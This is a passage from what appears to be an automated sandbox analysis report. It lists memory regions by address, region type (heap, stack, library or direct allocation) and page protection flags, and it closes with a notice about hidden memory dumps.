page read and write
|
||
|
24D90000
|
trusted library allocation
|
page read and write
|
||
|
5EFA000
|
trusted library allocation
|
page read and write
|
||
|
16CB5371000
|
trusted library allocation
|
page read and write
|
||
|
339A000
|
heap
|
page read and write
|
||
|
24AD5000
|
heap
|
page read and write
|
||
|
25800000
|
trusted library allocation
|
page read and write
|
||
|
24AEA000
|
heap
|
page read and write
|
||
|
3390000
|
heap
|
page read and write
|
||
|
16CBDA34000
|
heap
|
page read and write
|
||
|
24BF0000
|
trusted library allocation
|
page read and write
|
||
|
16CBDCD0000
|
heap
|
page read and write
|
||
|
197C28F0000
|
heap
|
page read and write
|
||
|
6E94000
|
heap
|
page read and write
|
||
|
7FFB4B3B0000
|
trusted library allocation
|
page read and write
|
||
|
257E0000
|
trusted library allocation
|
page read and write
|
||
|
16CBD7C3000
|
heap
|
page read and write
|
||
|
203970A0000
|
heap
|
page read and write
|
||
|
16CB5380000
|
trusted library allocation
|
page read and write
|
||
|
24D90000
|
trusted library allocation
|
page read and write
|
||
|
CA2000
|
trusted library allocation
|
page read and write
|
||
|
6DA8000
|
heap
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
3323000
|
trusted library allocation
|
page execute and read and write
|
||
|
D80000
|
heap
|
page read and write
|
||
|
4D9E000
|
stack
|
page read and write
|
||
|
24ECE000
|
stack
|
page read and write
|
||
|
248ED000
|
stack
|
page read and write
|
||
|
7FFB4B3E0000
|
trusted library allocation
|
page read and write
|
||
|
6E97000
|
heap
|
page read and write
|
||
|
24BE0000
|
trusted library allocation
|
page read and write
|
||
|
197C2924000
|
heap
|
page read and write
|
||
|
197C2480000
|
heap
|
page read and write
|
||
|
203970F0000
|
heap
|
page read and write
|
||
|
25760000
|
trusted library allocation
|
page read and write
|
||
|
197C2927000
|
heap
|
page read and write
|
||
|
16CA5781000
|
trusted library allocation
|
page read and write
|
||
|
24710000
|
trusted library allocation
|
page read and write
|
||
|
197C28F1000
|
heap
|
page read and write
|
||
|
56FB000
|
trusted library allocation
|
page read and write
|
||
|
5EB9000
|
trusted library allocation
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
197C0AEE000
|
heap
|
page read and write
|
||
|
334A000
|
trusted library allocation
|
page execute and read and write
|
||
|
2DB0000
|
heap
|
page read and write
|
||
|
77D6000
|
heap
|
page read and write
|
||
|
762E000
|
stack
|
page read and write
|
||
|
16CA75A8000
|
trusted library allocation
|
page read and write
|
||
|
16CA37E0000
|
heap
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
DB0000
|
heap
|
page read and write
|
||
|
72C0000
|
direct allocation
|
page read and write
|
||
|
16CA5170000
|
heap
|
page readonly
|
||
|
CA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B166000
|
trusted library allocation
|
page read and write
|
||
|
16CA51F0000
|
trusted library allocation
|
page read and write
|
||
|
25770000
|
trusted library allocation
|
page read and write
|
||
|
25860000
|
heap
|
page read and write
|
||
|
16CBD707000
|
heap
|
page execute and read and write
|
||
|
7FFB4B16C000
|
trusted library allocation
|
page execute and read and write
|
||
|
8910000
|
heap
|
page read and write
|
||
|
197C2A1E000
|
heap
|
page read and write
|
||
|
16CA58AF000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B320000
|
trusted library allocation
|
page read and write
|
||
|
197C29FA000
|
heap
|
page read and write
|
||
|
2254E000
|
stack
|
page read and write
|
||
|
25760000
|
trusted library allocation
|
page read and write
|
||
|
197C0AD6000
|
heap
|
page read and write
|
||
|
52E9CB9000
|
stack
|
page read and write
|
||
|
25760000
|
trusted library allocation
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
197C0AE6000
|
heap
|
page read and write
|
||
|
24BF0000
|
trusted library allocation
|
page read and write
|
||
|
24BF0000
|
trusted library allocation
|
page read and write
|
||
|
24BF0000
|
trusted library allocation
|
page read and write
|
||
|
226A0000
|
trusted library allocation
|
page read and write
|
||
|
2FCF000
|
unkown
|
page read and write
|
||
|
9F47000
|
direct allocation
|
page execute and read and write
|
||
|
16CA5E1C000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B2C0000
|
trusted library allocation
|
page read and write
|
||
|
197C29EB000
|
heap
|
page read and write
|
||
|
24AE0000
|
heap
|
page read and write
|
||
|
6C90000
|
direct allocation
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
25760000
|
trusted library allocation
|
page read and write
|
||
|
7310000
|
direct allocation
|
page read and write
|
||
|
52EA98D000
|
stack
|
page read and write
|
||
|
7B00000
|
trusted library allocation
|
page read and write
|
||
|
24D90000
|
trusted library allocation
|
page read and write
|
||
|
25760000
|
trusted library allocation
|
page read and write
|
||
|
3370000
|
trusted library allocation
|
page read and write
|
||
|
197C2923000
|
heap
|
page read and write
|
||
|
2571D000
|
stack
|
page read and write
|
||
|
24ADC000
|
heap
|
page read and write
|
||
|
24860000
|
heap
|
page read and write
|
||
|
2C20000
|
heap
|
page read and write
|
||
|
6CC0000
|
direct allocation
|
page read and write
|
||
|
7CE1AFE000
|
stack
|
page read and write
|
||
|
236D1000
|
trusted library allocation
|
page read and write
|
||
|
197C0AE8000
|
heap
|
page read and write
|
||
|
226A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B410000
|
trusted library allocation
|
page read and write
|
||
|
3310000
|
trusted library allocation
|
page read and write
|
||
|
6CD0000
|
direct allocation
|
page read and write
|
||
|
226A0000
|
trusted library allocation
|
page read and write
|
||
|
16CA3887000
|
heap
|
page read and write
|
||
|
25760000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B3F0000
|
trusted library allocation
|
page read and write
|
||
|
24C10000
|
trusted library allocation
|
page read and write
|
||
|
197C0AD8000
|
heap
|
page read and write
|
||
|
7764000
|
heap
|
page read and write
|
||
|
22567000
|
heap
|
page read and write
|
||
|
16CA73A6000
|
trusted library allocation
|
page read and write
|
||
|
24BD0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B440000
|
trusted library allocation
|
page read and write
|
||
|
226A0000
|
trusted library allocation
|
page read and write
|
||
|
88DC000
|
stack
|
page read and write
|
||
|
22470000
|
direct allocation
|
page read and write
|
||
|
3330000
|
trusted library allocation
|
page read and write
|
||
|
CB2000
|
trusted library allocation
|
page read and write
|
||
|
236F9000
|
trusted library allocation
|
page read and write
|
||
|
197C28D3000
|
heap
|
page read and write
|
||
|
203970FB000
|
heap
|
page read and write
|
||
|
24970000
|
trusted library allocation
|
page read and write
|
||
|
197C28DB000
|
heap
|
page read and write
|
||
|
6CE0000
|
direct allocation
|
page read and write
|
||
|
24982000
|
trusted library allocation
|
page read and write
|
||
|
16CA6FB1000
|
trusted library allocation
|
page read and write
|
||
|
226A5000
|
trusted library allocation
|
page read and write
|
||
|
197C0AD4000
|
heap
|
page read and write
|
||
|
7FFB4B2B0000
|
trusted library allocation
|
page read and write
|
||
|
25760000
|
trusted library allocation
|
page read and write
|
||
|
52E96FD000
|
stack
|
page read and write
|
||
|
197C2A36000
|
heap
|
page read and write
|
||
|
197C28D4000
|
heap
|
page read and write
|
||
|
197C28C2000
|
heap
|
page read and write
|
||
|
16CA60B6000
|
trusted library allocation
|
page read and write
|
||
|
2210F000
|
stack
|
page read and write
|
||
|
24BF0000
|
trusted library allocation
|
page read and write
|
||
|
8938000
|
heap
|
page read and write
|
||
|
4BE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
197C29FE000
|
heap
|
page read and write
|
||
|
247A0000
|
trusted library allocation
|
page read and write
|
||
|
8CA0000
|
direct allocation
|
page read and write
|
||
|
20397324000
|
heap
|
page read and write
|
||
|
24C00000
|
trusted library allocation
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
7B90000
|
trusted library allocation
|
page read and write
|
||
|
303E000
|
stack
|
page read and write
|
||
|
25760000
|
trusted library allocation
|
page read and write
|
||
|
16CBDA15000
|
heap
|
page read and write
|
||
|
8765000
|
trusted library allocation
|
page read and write
|
||
|
24BD0000
|
trusted library allocation
|
page read and write
|
||
|
86C0000
|
trusted library allocation
|
page read and write
|
||
|
C8D000
|
trusted library allocation
|
page execute and read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
8B90000
|
trusted library allocation
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
25760000
|
trusted library allocation
|
page read and write
|
||
|
16CB566B000
|
trusted library allocation
|
page read and write
|
||
|
20397320000
|
heap
|
page read and write
|
||
|
25760000
|
trusted library allocation
|
page read and write
|
||
|
16CA58A3000
|
trusted library allocation
|
page read and write
|
||
|
16CA757C000
|
trusted library allocation
|
page read and write
|
||
|
6E67000
|
heap
|
page read and write
|
||
|
31AB000
|
heap
|
page read and write
|
||
|
257E0000
|
trusted library allocation
|
page read and write
|
||
|
24D90000
|
trusted library allocation
|
page read and write
|
||
|
22690000
|
trusted library allocation
|
page read and write
|
||
|
4EF4000
|
trusted library allocation
|
page read and write
|
||
|
24BF0000
|
trusted library allocation
|
page read and write
|
||
|
24C00000
|
trusted library allocation
|
page read and write
|
||
|
2230D000
|
stack
|
page read and write
|
||
|
7ABE000
|
stack
|
page read and write
|
||
|
F4D000
|
stack
|
page read and write
|
||
|
75EE000
|
stack
|
page read and write
|
||
|
197C28C0000
|
heap
|
page read and write
|
||
|
6E59000
|
heap
|
page read and write
|
||
|
16CA58AB000
|
trusted library allocation
|
page read and write
|
||
|
4CDE000
|
stack
|
page read and write
|
||
|
52E977E000
|
stack
|
page read and write
|
||
|
197C29FA000
|
heap
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
24BF0000
|
trusted library allocation
|
page read and write
|
||
|
893C000
|
heap
|
page read and write
|
||
|
4E91000
|
trusted library allocation
|
page read and write
|
||
|
6E14000
|
heap
|
page read and write
|
||
|
257F6000
|
trusted library allocation
|
page read and write
|
||
|
7840000
|
heap
|
page execute and read and write
|
||
|
16CA38B5000
|
heap
|
page read and write
|
||
|
24C30000
|
trusted library allocation
|
page read and write
|
||
|
31E1000
|
heap
|
page read and write
|
||
|
16CA7337000
|
trusted library allocation
|
page read and write
|
||
|
197C28CB000
|
heap
|
page read and write
|
||
|
24AE9000
|
heap
|
page read and write
|
||
|
52E9DBE000
|
stack
|
page read and write
|
||
|
7FFB4B370000
|
trusted library allocation
|
page read and write
|
||
|
197C28C1000
|
heap
|
page read and write
|
||
|
226B0000
|
trusted library allocation
|
page read and write
|
||
|
197C0A25000
|
heap
|
page read and write
|
||
|
85D0000
|
trusted library allocation
|
page read and write
|
||
|
16CA3805000
|
heap
|
page read and write
|
||
|
16CA3920000
|
heap
|
page read and write
|
||
|
25760000
|
trusted library allocation
|
page read and write
|
||
|
8B6D000
|
stack
|
page read and write
|
||
|
8931000
|
heap
|
page read and write
|
||
|
24D91000
|
trusted library allocation
|
page read and write
|
||
|
16CA6F71000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B0B3000
|
trusted library allocation
|
page execute and read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B430000
|
trusted library allocation
|
page read and write
|
||
|
B347000
|
direct allocation
|
page execute and read and write
|
||
|
7BC0000
|
trusted library allocation
|
page read and write
|
||
|
6D57000
|
heap
|
page read and write
|
||
|
220CE000
|
stack
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
221B0000
|
trusted library allocation
|
page read and write
|
||
|
2499D000
|
trusted library allocation
|
page read and write
|
||
|
24BE0000
|
trusted library allocation
|
page read and write
|
||
|
7B50000
|
trusted library allocation
|
page read and write
|
There are 825 hidden memdumps, click here to show them.